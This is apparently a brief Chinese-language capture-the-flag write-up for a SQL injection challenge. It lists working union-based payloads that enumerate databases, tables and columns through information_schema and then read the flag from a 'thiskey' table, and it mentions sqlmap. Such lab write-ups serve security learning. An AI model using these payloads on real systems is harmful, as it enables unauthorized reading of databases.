跟之前的sql类似,尝试基本的注入
id=1 and 1=1
发现不报错,可以注入。
以一样的方式爆库爆表爆字段,注意输出是两个字段的。
id=1 and 1=2 union select 1,schema_name from information_schema.schemata
id=1 and 1=2 union select 1,table_name from information_schema.tables
id=1 and 1=2 union select 1,column_name from information_schema.columns
最后
id=1 and 1=2 union select 1,k0y from thiskey
得出结果。
sqlmap使用方法可以看官方视频
sqlmap使用